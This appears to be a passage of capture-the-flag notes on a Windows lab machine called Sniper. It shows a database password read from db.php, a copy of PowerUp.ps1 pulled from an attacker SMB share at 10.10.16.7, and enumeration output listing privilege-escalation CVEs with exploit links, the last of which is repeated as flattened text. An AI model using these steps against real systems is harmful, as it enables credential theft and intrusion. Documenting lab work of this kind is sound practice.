5 box enum nt authority\iusr

C:\inetpub\wwwroot\user>more db.php
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
  {
  echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>

# files are deleted from temp; using C:\windows\System32\spool\drivers\color

PowerUp.ps1

C:\Windows\System32\spool\drivers\color>copy \\10.10.16.7\drive\PowerUp.ps1
Operation did not complete successfully because the file contains a virus or potentially unwanted software.
        0 file(s) copied.

PEAS

[*] Enumerating installed KBs...
 [!] CVE-2019-0836 : VULNERABLE
  [>] https://exploit-db.com/exploits/46718
  [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

 [!] CVE-2019-0841 : VULNERABLE
  [>] https://github.com/rogue-kdc/CVE-2019-0841
  [>] https://rastamouse.me/tags/cve-2019-0841/

 [!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/

 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253
  [>] https://github.com/sgabe/CVE-2019-1253

 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg

 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388

 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk

 [!] CVE-2020-0668 : VULNERABLE
  [>] https://github.com/itm4n/SysTracingPoc

 [!] CVE-2020-0683 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2020-0683
  [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1

 [!] CVE-2020-1013 : VULNERABLE
  [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/

 [*] Finished. Found 12 potential vulnerabilities.
 
͹ Users
SNIPER\Administrator: Built-in account for administering the computer/domain
SNIPER\Chris

͹ Installed Applications --Via Program Files/Uninstall registry--
    C:\Program Files\MySQL
    C:\Program Files\runphp

͹ Current TCP Listening Ports
  TCP        127.0.0.1             49672         127.0.0.1             49673           Established       6760            mysqld
  TCP        127.0.0.1             49673         127.0.0.1             49672           Established       6760            mysqld

Previous6 privesc_1 PrintSpoofer Next4 :80 /blog > LFI > smbRFI

Last updated 4 years ago

[*] Enumerating installed KBs... [!] CVE-2019-0836 : VULNERABLE [>] https://exploit-db.com/exploits/46718 [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/ [!] CVE-2019-0841 : VULNERABLE [>] https://github.com/rogue-kdc/CVE-2019-0841 [>] https://rastamouse.me/tags/cve-2019-0841/ [!] CVE-2019-1064 : VULNERABLE [>] https://www.rythmstick.net/posts/cve-2019-1064/ [!] CVE-2019-1130 : VULNERABLE [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear [!] CVE-2019-1253 : VULNERABLE [>] https://github.com/padovah4ck/CVE-2019-1253 [>] https://github.com/sgabe/CVE-2019-1253 [!] CVE-2019-1315 : VULNERABLE [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html [!] CVE-2019-1385 : VULNERABLE [>] https://www.youtube.com/watch?v=K6gHnr-VkAg [!] CVE-2019-1388 : VULNERABLE [>] https://github.com/jas502n/CVE-2019-1388 [!] CVE-2019-1405 : VULNERABLE [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/ [>] https://github.com/apt69/COMahawk [!] CVE-2020-0668 : VULNERABLE [>] https://github.com/itm4n/SysTracingPoc [!] CVE-2020-0683 : VULNERABLE [>] https://github.com/padovah4ck/CVE-2020-0683 [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1 [!] CVE-2020-1013 : VULNERABLE [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/ [*] Finished. Found 12 potential vulnerabilities. ͹ Users SNIPER\Administrator: Built-in account for administering the computer/domain SNIPER\Chris ͹ Installed Applications --Via Program Files/Uninstall registry-- C:\Program Files\MySQL C:\Program Files\runphp ͹ Current TCP Listening Ports TCP 127.0.0.1 49672 127.0.0.1 49673 Established 6760 mysqld TCP 127.0.0.1 49673 127.0.0.1 49672 Established 6760 mysqld